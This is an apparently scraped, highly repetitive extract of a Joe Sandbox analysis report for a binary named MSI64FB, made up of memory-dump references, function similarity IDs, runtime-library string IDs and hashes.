                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2081738530-0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2081738530-0
                                                                                                                                                                                                                                                    • Opcode ID: fe0147dd7e8c9a9008553fd8054b97a45f220e1ff8879fcbf5305c1c729d6e27
                                                                                                                                                                                                                                                    • Instruction ID: fe093d70175b8a42916cf7b1d593f781d2b61ddd06e1745301a2676f05568684
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe0147dd7e8c9a9008553fd8054b97a45f220e1ff8879fcbf5305c1c729d6e27
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B316F22B0CA42D1FB19BF55E4445B9E371EB56BA0FA80231EA0D4B6E5DE7CE485C320
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2081738530-0
                                                                                                                                                                                                                                                    • Opcode ID: f686ba4721d73371ec3509b4bb3bffbc5e13784dbcae9ca6a7685ba5834ff75c
                                                                                                                                                                                                                                                    • Instruction ID: f65e732c2eaab0d37fb0ac8f8cd10fb29d16f0fb21ac166a3fb25b5405765952
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f686ba4721d73371ec3509b4bb3bffbc5e13784dbcae9ca6a7685ba5834ff75c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14315B22A1CB46D1EB09BF55E8405B9E371AB54BA0FD80531DA0E476E6DF6CE846C320
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2081738530-0
                                                                                                                                                                                                                                                    • Opcode ID: ed674da2ea5aa6c971b9e2f219bb36e38f2821b5822bd66971173a8d5023320b
                                                                                                                                                                                                                                                    • Instruction ID: da1167c9cfdc2b0466ce07e9f85c5bfc59213187937affecb417425a25b34242
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed674da2ea5aa6c971b9e2f219bb36e38f2821b5822bd66971173a8d5023320b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD31AE22B0CA46C1EB19BF15E8445B8E371EB44BA4FC80632EA1E476E5DF7CE446C320
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2081738530-0
                                                                                                                                                                                                                                                    • Opcode ID: 283118c82c41f587953163e7f4014d1a595101a97f08c758c1cd7f0638e265a5
                                                                                                                                                                                                                                                    • Instruction ID: b5110833b7b35dea31bfd20f58843429fe7f3f5e469f21d3101677d8a1245a0a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 283118c82c41f587953163e7f4014d1a595101a97f08c758c1cd7f0638e265a5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A319E22B0CB46D5EB09BF55E8445B9E370EB84BA4F980531DA0D476E5DE3CE886C320
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2081738530-0
                                                                                                                                                                                                                                                    • Opcode ID: 14c1cfe4f42c82462013705d13bf994eeaad3f4468061a80f1e898b84cfdccaf
                                                                                                                                                                                                                                                    • Instruction ID: bd590a2fc385f94297b6adde0802228cc85ee38977c0225e351fab2e7089f448
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 14c1cfe4f42c82462013705d13bf994eeaad3f4468061a80f1e898b84cfdccaf
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04313E22B0CB42D1EB19BF55E8445B9A371EB54BA4F980635DA0E47BD5DE6CE842C320
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2081738530-0
                                                                                                                                                                                                                                                    • Opcode ID: 7c14fbb30dc9cb119fca478a610244d5d74f2091f0ffb53f0a5167794b2ec2a0
                                                                                                                                                                                                                                                    • Instruction ID: 4740aee58702d05c2b3c50a3a258b157b4e633d701df3c53a3cca8ee3c176e8c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7c14fbb30dc9cb119fca478a610244d5d74f2091f0ffb53f0a5167794b2ec2a0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E731AE26B0CA42D1EB09BF55E8405B9E370EB84BA0FC80631EA5D076E5DE3CE546C320
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2081738530-0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2081738530-0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2081738530-0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2081738530-0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2081738530-0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                                                                                                    • API String ID: 3523768491-393685449
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast$Value$FreeHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 365477584-0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                    • String ID: false$true
                                                                                                                                                                                                                                                    • API String ID: 118556049-2658103896
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                                                                                                    • String ID: bad locale name
                                                                                                                                                                                                                                                    • API String ID: 2775327233-1405518554
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$AllocLocalLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                                                                                                    • String ID: bad locale name
                                                                                                                                                                                                                                                    • API String ID: 1970615557-1405518554
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CertNameString$FreeLocal_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                    • String ID: 0123456789abcdefghjkmnpqrstvwxyz
                                                                                                                                                                                                                                                    • API String ID: 1194004671-2680470996
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$AllocLocalLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                                                                                                    • String ID: bad locale name
                                                                                                                                                                                                                                                    • API String ID: 1970615557-1405518554
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Lockit$AllocLocalLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                                                                                                    • String ID: bad locale name
                                                                                                                                                                                                                                                    • API String ID: 1970615557-1405518554
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeLocal_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                    • String ID: ios_base::failbit set
                                                                                                                                                                                                                                                    • API String ID: 195334829-3924258884
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Maklocstr$Getvals
                                                                                                                                                                                                                                                    • String ID: false$true
                                                                                                                                                                                                                                                    • API String ID: 3025811523-2658103896
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AdjustPointer
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1740715915-0
Similarity
• API ID: Local$Alloc$Concurrency::cancel_current_taskFree_invalid_parameter_noinfo_noreturn
• String ID:
• API String ID: 1259271893-0
Similarity
• API ID: Local$AllocConcurrency::cancel_current_taskFree_invalid_parameter_noinfo_noreturn
• String ID:
• API String ID: 4101084277-0
Similarity
• API ID: Local$AllocConcurrency::cancel_current_taskFree_invalid_parameter_noinfo_noreturn
• String ID:
• API String ID: 4101084277-0
Similarity
• API ID: FreeLocal
• String ID:
• API String ID: 2826327444-0
Similarity
• API ID: Local$Alloc$Concurrency::cancel_current_taskFree_invalid_parameter_noinfo_noreturn
• String ID:
• API String ID: 1259271893-0
                                                                                                                                                                                                                                                    • Opcode ID: ab0cc08f99234d715a179517fc8b4ba6950f5af868b2200aedc5622ef0d96408
                                                                                                                                                                                                                                                    • Instruction ID: d105a78f1109803901ca0257ec56d81af79919318711087dceb38a551359c35b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ab0cc08f99234d715a179517fc8b4ba6950f5af868b2200aedc5622ef0d96408
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FE41E161B8CB82C5EB14BF12A504B69E762FB15BE4F984630DE5D0B7D5DE7CE0418320
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
Memory Dump Source
• Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
Similarity
• API ID: ErrorLast
• String ID: Call to ShellExecuteEx() returned:$Last error=$false$true
• API String ID: 1452528299-1782174991
Similarity
• API ID: AllocConcurrency::cancel_current_taskLocalUninitialize_invalid_parameter_noinfo_noreturn
• String ID:
• API String ID: 121216245-0
Similarity
• API ID: CallEncodePointerTranslator
• String ID: MOC$RCC
• API String ID: 3544855599-2084237596
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm
• API String ID: 2395640692-1018135373
Similarity
• API ID: Lockitstd::_$Concurrency::cancel_current_taskLockit::_Lockit::~_
• String ID: bad locale name
• API String ID: 2115809835-1405518554
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                    • String ID: csm$csm
                                                                                                                                                                                                                                                    • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                                                                                                                    • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DirectoryErrorFindHeapLastLibraryLoadProcessResourceSystemwmemcpy_s
                                                                                                                                                                                                                                                    • String ID: ntdll.dll
                                                                                                                                                                                                                                                    • API String ID: 2090340569-2227199552
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Maklocwcsstd::_$Getvals
                                                                                                                                                                                                                                                    • String ID: $+xv$$+xv$+v$x+v$xv$+xv+$xv$+x+$vx+$vx$v+x+$vx$+vx+v $+v $v $+v +$v $++$ v+$ v$ v++$ v$+ v+xv$+ v$v$ +v+ $v$ ++x$v+ $v$v ++ $v$ +v
                                                                                                                                                                                                                                                    • API String ID: 1848906033-3573081731
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2718003287-0
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 73155330-0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00007FF749F9B6CB), ref: 00007FF749F9B7FE
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ConsoleMode
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4145635619-0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast
                                                                                                                                                                                                                                                    • String ID: > returned:$Call to ShellExecute() for verb<$Last error=
                                                                                                                                                                                                                                                    • API String ID: 1452528299-1781106413
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Similarity
